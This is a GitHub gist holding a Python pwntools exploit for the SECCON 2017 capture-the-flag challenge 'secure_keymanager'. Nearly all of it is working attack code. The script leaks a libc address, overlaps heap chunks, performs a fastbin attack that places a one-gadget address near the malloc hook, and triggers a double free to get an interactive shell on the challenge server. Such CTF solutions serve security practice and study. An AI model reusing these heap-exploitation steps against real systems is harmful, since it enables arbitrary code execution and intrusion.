Skip to content

Instantly share code, notes, and snippets.

@romanking98
Created December 11, 2017 08:21
Show Gist options
  • Save romanking98/9c1b4dc01b81021082fe189fdc082d38 to your computer and use it in GitHub Desktop.
Save romanking98/9c1b4dc01b81021082fe189fdc082d38 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
from pwn import *
p = remote("secure_keymanager.pwn.seccon.jp",47225)
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"})
raw_input()
def menu():
p.recvuntil(">>")
def add_key(length,title,key):
menu()
p.sendline("1")
p.recvuntil("key length...")
p.sendline(str(length))
p.recvuntil("title...")
p.send(title)
#p.recvuntil("key...")
p.send(key)
def show():
menu()
p.sendline("2")
# DO AS PER YOUR LIKING
def edit_key(idx,new):
menu()
p.sendline("3")
menu()
name = "A"*8
name += p64(0x21) # 32 byte buffer
p.sendline(name)
password = "B"*6 + "\x00"
menu()
p.sendline(password)
p.recvuntil("...")
p.sendline(str(idx))
p.recvuntil("...")
p.sendline(new)
def remove_key(idx):
menu()
p.sendline("4")
menu()
name = "A"*8
name += p64(0x21) # 32 byte buffer
p.sendline(name)
password = "B"*6 + "\x00"
menu()
p.sendline(password)
p.recvuntil("...")
p.sendline(str(idx))
def leak(name):
p.sendlineafter('>> ', '9')
p.sendafter('>> ', name)
p.recvuntil(name)
return u64(p.recv(6).ljust(8, '\x00'))
name = "A"*8
name += p64(0x21) # 32 byte buffer
password = "B"*6 + "\x00" # 16 byte buffer
p.recvuntil("Account Name >>")
p.send(name)
p.recvuntil("Master Pass >>")
p.sendline(password)
libc = leak('A'*0x18) - 0x3c5620
log.success("Libc: " + hex(libc))
#################################
buf1 = "X"*24
buf1 += "\xd1"
buf2 = "Y"*16
buf2 += p64(0xd0)
buf2 += "\x60\x01"
add_key(-10,"\n","")
add_key(130,"CCCCC\n","DDDDDDDD\n")
add_key(-10,"\n","")
add_key(130,"CCCCCCCC\n","DDDDDDDD\n")
wild = "C"*24
wild += "\x90" # Set to point to wilderness chunk.
add_key(130,wild,"DDDDDDDD\n")
remove_key(1)
remove_key(2)
remove_key(0)
add_key(-10,buf1,"")
add_key(-10,buf2,"")
remove_key(3)
# Overlapped with fastbin.
add_key(100,"CC\n","DDDD\n")
payload = "F"*24
payload += "\x71"
add_key(94,payload,"\n")
add_key(50,"\n","\n")
add_key(2,"\n","\n") # Try to align top chunk with an already malloc'ed chunk and then get 2 ptrs to point there.
# Used later to trigger double free.
spirit = p64(libc + 0x3c4aed)
spirit += "\n"
remove_key(1)
edit_key(3,spirit)
raw_input()
magic = libc + 0xf0274
add_key(70,"aaaa\n","\n")
finale = "R"*19
finale += p64(magic) + "\n"
add_key(70,finale,"\n")
# Now we have 2 ptrs pointing to same chunk. So, can trigger double free.
remove_key(4)
remove_key(6)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment